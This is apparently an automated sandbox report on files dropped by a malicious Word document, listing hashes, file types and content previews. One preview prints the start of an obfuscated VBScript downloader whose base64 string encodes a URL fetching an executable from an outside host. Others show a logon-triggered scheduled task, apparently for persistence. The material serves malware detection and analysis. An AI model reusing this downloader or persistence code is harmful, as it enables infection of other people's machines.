                    MD5:668B497E20E06B79D51DF9168519289D
                    SHA1:FEFFA7A4A5DBC1BFBF1EAA060F8C1FA9B1D220B2
                    SHA-256:7D5D867A0DC8ACC36333DA47F96F772F88935ABA0FD126B3B8B2A5E49F936D1E
                    SHA-512:867B25C88B501A0D69912FBFE9B2629F2A3D034637B78F5B27ECE14D9D90B7523720053D351AFE03782779207146FF160FA6740D73BC9EACACAF011239A31DCB
                    Malicious:false
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):44098
                    Entropy (8bit):2.8795995628350415
                    Encrypted:false
                    SSDEEP:768:jl/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:pFia0Dqeb0nstw29rVzWSgm58F
                    MD5:504BCEB76B1B1F81805B3CEF7AF2ADB9
                    SHA1:C27B1C1B74FE742D7CBCF761A77228DB521355CC
                    SHA-256:4F4592D04ECE34F52E4A726EC2F1305E403BF7F763658AFCF79ADC209DD3229D
                    SHA-512:F31F3225059F17A91E5200EA9777556609FC5929C00CEDA402AC56B68168F03042A4B5ABA9F18478F94A3D194E65ABCA53E8455D0DA956EE286EC2429E7B2F11
                    Malicious:false
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1024
                    Entropy (8bit):0.05390218305374581
                    Encrypted:false
                    SSDEEP:3:ol3lYdn:4Wn
                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                    Malicious:false
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1536
                    Entropy (8bit):1.3586208805849453
                    Encrypted:false
                    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlba:IiiiiiiiiifdLloZQc8++lsJe1Mz9
                    MD5:6B81A62087B1275058CB5F290E114665
                    SHA1:BA97D7EC2644E7820E7617C33981B5FA31102E77
                    SHA-256:792572FCB0FDB7529A0B19092F03EA77C96E89B2DF16A08BCEDDDEA6DEEFE2AC
                    SHA-512:EEBB0F889DD906DC2FA0458AD2B467045B7CD8724553265D77E85232F9F17A363C683FFB1D50133B153C8D8ACCD4B0F07A8228C950681C269E65C0A3367B8130
                    Malicious:false
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):14967
                    Entropy (8bit):5.2903052371566135
                    Encrypted:false
                    SSDEEP:384:tnO6zzakaBa9aRaOa2EqJpvaYQci7oOoLEEE6oEaE32vwnAn8rb8WbTy:VOwzakaBa9aRaOa2EgpvaPCOoYPW1+wI
                    MD5:8897D3DECD33AFBC963A1237D8243E51
                    SHA1:2647121672D52A64186778657026815EF6431B08
                    SHA-256:5856851814E97939F46FD211B8F48F64E1DC0EE6A6CF0EA37C9D890C97B2E513
                    SHA-512:DE62D246BCE7A60476AF59E466D7FFE51C4CC621B3D35B8B2E2E277C901E4F875D7175610DD74795C90281AE9FA96CB1289A5EC7196B7AEE1706C3F20224AB34
                    Malicious:true
                    Preview:..<scriptleT.. >..<script language = 'vbscript'>....fsdfdsfs = "aHR0UDovL2xvZ2luLjkyOTM4OS5hbmt1cmEudXMvQXdPZ1lpV0cvZXhwbG9yZXIuZXhl" '98t9t..yulkytjtrhtjrkdsarjky ="ZXhwbG9yZXIuZXhl" '98t9t....sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"..sdpfkdfhow = "..F0.........ECD7............B8......9C.9892....9B"....Function age64Procode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. ' available via .nodeTypedValue, which we can pass to BytesToStr().. kvjusvsfdcsb = "bje".. cvbnm = "CreateO" + kvjusvsfdcsb + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr =
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:gAWY3n:qY3n
                    MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                    SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                    SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                    SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                    Malicious:false
                    Preview:[ZoneTransfer]..ZoneId=3..
                    Process:C:\Users\user\AppData\Roaming\explorer.exe
                    File Type:XML 1.0 document, ASCII text
                    Category:dropped
                    Size (bytes):1576
                    Entropy (8bit):5.106338392454611
                    Encrypted:false
                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtEIxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTEov
                    MD5:0490F3A3332FFCEB090DAAA0B90A5B44
                    SHA1:BCE6A4967E641B4A375CEE835D68D8DDD2702616
                    SHA-256:4346980FD7752A0B0374BE54812F21EE8D166DB258922926EC50EA99085390C3
                    SHA-512:3A987832EA3B135E6C1DFBACB4C35E603AE0F92B5F75784380E0D05E9EE356110DB74F3B7654EE92C52B679537EB8A3220E39F9E1F9E4C006DDDEEA5238BF5AA
                    Malicious:false
                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                    Process:C:\Users\user\AppData\Roaming\explorer.exe
                    File Type:XML 1.0 document, ASCII text
                    Category:dropped
                    Size (bytes):1576
                    Entropy (8bit):5.106338392454611
                    Encrypted:false
                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtEIxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTEov
                    MD5:0490F3A3332FFCEB090DAAA0B90A5B44
                    SHA1:BCE6A4967E641B4A375CEE835D68D8DDD2702616
                    SHA-256:4346980FD7752A0B0374BE54812F21EE8D166DB258922926EC50EA99085390C3
                    SHA-512:3A987832EA3B135E6C1DFBACB4C35E603AE0F92B5F75784380E0D05E9EE356110DB74F3B7654EE92C52B679537EB8A3220E39F9E1F9E4C006DDDEEA5238BF5AA
                    Malicious:true
                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                    Process:C:\Users\user\AppData\Roaming\explorer.exe
                    File Type:XML 1.0 document, ASCII text
                    Category:dropped
                    Size (bytes):1576
                    Entropy (8bit):5.106338392454611
                    Encrypted:false
                    SSDEEP:24:2di4+S2qhZ1ty1mCUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtEIxvn:cgeZQYrFdOFzOzN33ODOiDdKrsuTEov
                    MD5:0490F3A3332FFCEB090DAAA0B90A5B44
                    SHA1:BCE6A4967E641B4A375CEE835D68D8DDD2702616
                    SHA-256:4346980FD7752A0B0374BE54812F21EE8D166DB258922926EC50EA99085390C3
                    SHA-512:3A987832EA3B135E6C1DFBACB4C35E603AE0F92B5F75784380E0D05E9EE356110DB74F3B7654EE92C52B679537EB8A3220E39F9E1F9E4C006DDDEEA5238BF5AA
                    Malicious:false
                    Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:53 2022, mtime=Tue Mar 8 15:45:53 2022, atime=Fri Sep 23 14:13:10 2022, length=221545, window=hide
                    Category:dropped
                    Size (bytes):1249
                    Entropy (8bit):4.605411221812945
                    Encrypted:false
                    SSDEEP:24:8S/XThOMEf/xfPGpUc8f4urejVPLRGpUc8f4+Dv3qSncX7cY:8S/XT4VHxfPGmc8f4ur8dGmc8f41WKl
                    MD5:039B3BAE1AC43CFB4B7A55E0718CE3DE
                    SHA1:5AC7365C5347CB79104F8D8AFFA1D06C682E69C5
                    SHA-256:6050A6269F4F98C76500E88338B39A51ACA713B42DA3B9BB317FE91AC95CF462
                    SHA-512:FCEBDF39501F151E63AD1C362E1A0BBABAB589146264FAFBF01A855344966CDBC14D61C5DE38D24A66ED81ADBE0CED2464FA1F42CCCB9B99F536529832B94E97
                    Malicious:false
                    Preview:L..................F.... ........3.......3..,.j.^...ia......................-....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.ia..7U.y .ITEMSE~1.DOC.........hT..hT..*...r.....'...............I.t.e.m. .S.e.l.e.c.t.i.o.n. .-. .I.n.q.u.i.r.y. .0.0.5.4.3.6.3.A.Z.H. .-. .A.l.t.a.y.G.l.o.b.a.l. .T.r.a.d.i.n.g...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\320946\Users.user\Desktop\Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.doc.T.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.t.e.m. .S.e.l.e.c.t.i.o.n. .-. .I.n.q.u.i.r.y. .0.0.5.4.3.6.3.A.Z.H. .-. .A.l.t.a.y.G.l.o.b.a.l. .T.r.a.d.i.n.g...d.o.c.........:..,.LB.)...Ag...
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):5.127513882806606
                    Encrypted:false
                    SSDEEP:3:bDuMJl0RGlKCEQRWTj/tyWiTJ11lmX11IMlKCEQRWTj/tyWiTJ11lv:bCZGlvwnSThElvwnSTh1
                    MD5:8745E4FCA864966DBC611F9B69DB56FF
                    SHA1:00042A24EF471653B234494113FD49D58F966DA0
                    SHA-256:AE311E511D5247016BD50D3ECB1B74EF5043E70F5FE80740B4873C2D1F9EC9BA
                    SHA-512:011C715456294F33A9E5550B1081E5CEBFD278359467BCDC983C42A279AE06770754EE8F8A4E7DB7AF59116FBF66C295874C22602CEE37C9E47A93447AE93C76
                    Malicious:false
                    Preview:[folders]..Templates.LNK=0..Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.LNK=0..[doc]..Item Selection - Inquiry 0054363AZH - AltayGlobal Trading.LNK=0..
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.503835550707525
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVyaJybdJylp2bG/WWNJbilFGUld/ln:vdsCkWtz8Oz2q/rViXdH/l
                    MD5:7CFA404FD881AF8DF49EA584FE153C61
                    SHA1:32D9BF92626B77999E5E44780BF24130F3D23D66
                    SHA-256:248DB6BD8C5CD3542A5C0AE228D3ACD6D8A7FA0C0C62ABC3E178E57267F6CCD7
                    SHA-512:F7CEC1177D4FF3F84F6F2A2A702E96713322AA56C628B49F728CD608E880255DA3EF412DE15BB58DF66D65560C03E68BA2A0DD6FDFA533BC9E428B0637562AEA
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........1h..............2h.............@3h..............3h.....z.......p4h.....x...
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Little-endian UTF-16 Unicode text, with no line terminators
                    Category:dropped
                    Size (bytes):2
                    Entropy (8bit):1.0
                    Encrypted:false
                    SSDEEP:3:Qn:Qn
                    MD5:F3B25701FE362EC84616A93A45CE9998
                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                    Malicious:false
                    Preview:..
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.578048501856237
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
                    MD5:0F8AC75BD0077688ACCFEE9437697FA8
                    SHA1:08223348762A77176589DB294E05FF3C20C3218D
                    SHA-256:EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
                    SHA-512:4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.578048501856237
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
                    MD5:0F8AC75BD0077688ACCFEE9437697FA8
                    SHA1:08223348762A77176589DB294E05FF3C20C3218D
                    SHA-256:EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
                    SHA-512:4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.578048501856237
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
                    MD5:0F8AC75BD0077688ACCFEE9437697FA8
                    SHA1:08223348762A77176589DB294E05FF3C20C3218D
                    SHA-256:EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
                    SHA-512:4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.580975945365273
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
                    MD5:E0773AA865B4F855FCAF7F3A6E7A84D9
                    SHA1:CD5131197E93BA193CBDBAA557F5059DF306EFF9
                    SHA-256:C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
                    SHA-512:FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.580975945365273
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
                    MD5:E0773AA865B4F855FCAF7F3A6E7A84D9
                    SHA1:CD5131197E93BA193CBDBAA557F5059DF306EFF9
                    SHA-256:C844ED3F932800F43BE0BE58F914E997365E68D36A57B2782A1214814FED62A4
                    SHA-512:FD39BB310FE0677C3D467694A959FAC30638501A201971FEB3CFF36C54E093E375E299096EA2772B4A5F148F4FAF8E2C3A4F4A37A8C70EC00053055ABB4C3E63
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.578048501856237
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
                    MD5:0F8AC75BD0077688ACCFEE9437697FA8
                    SHA1:08223348762A77176589DB294E05FF3C20C3218D
                    SHA-256:EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
                    SHA-512:4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.578048501856237
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zbJYtHryuyr6ylUVajp:cW1oUz8WdHnor2zbGd+6Ajp
                    MD5:0F8AC75BD0077688ACCFEE9437697FA8
                    SHA1:08223348762A77176589DB294E05FF3C20C3218D
                    SHA-256:EBB34E5231A8FFD7BC715A58F2503AC1E5311FD713A147DE87F46F2224920226
                    SHA-512:4BD9EB889798189D6F66B8DFDAB329E46368D0AF211C0AA2655C98782B63B1581592502D2C667A62CE4C0A15B92A9752092BC36FFD6917B1C9DC0C7A0BAF1FC6
                    Malicious:false
                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):8016
                    Entropy (8bit):3.580975945365273
                    Encrypted:false
                    SSDEEP:96:chQCwMqAqvsqvJCwoUz8hQCwMqAqvsEHyqvJCwor2zgJKrXHr6H6ylUVajp:cW1oUz8WdHnor2zgwv6H6Ajp
                    MD5:E0773AA865B4F855FCAF7F3A6E7A84D9
                    SHA1:CD5131197E93BA193CBDBAA557F5059DF306EFF9
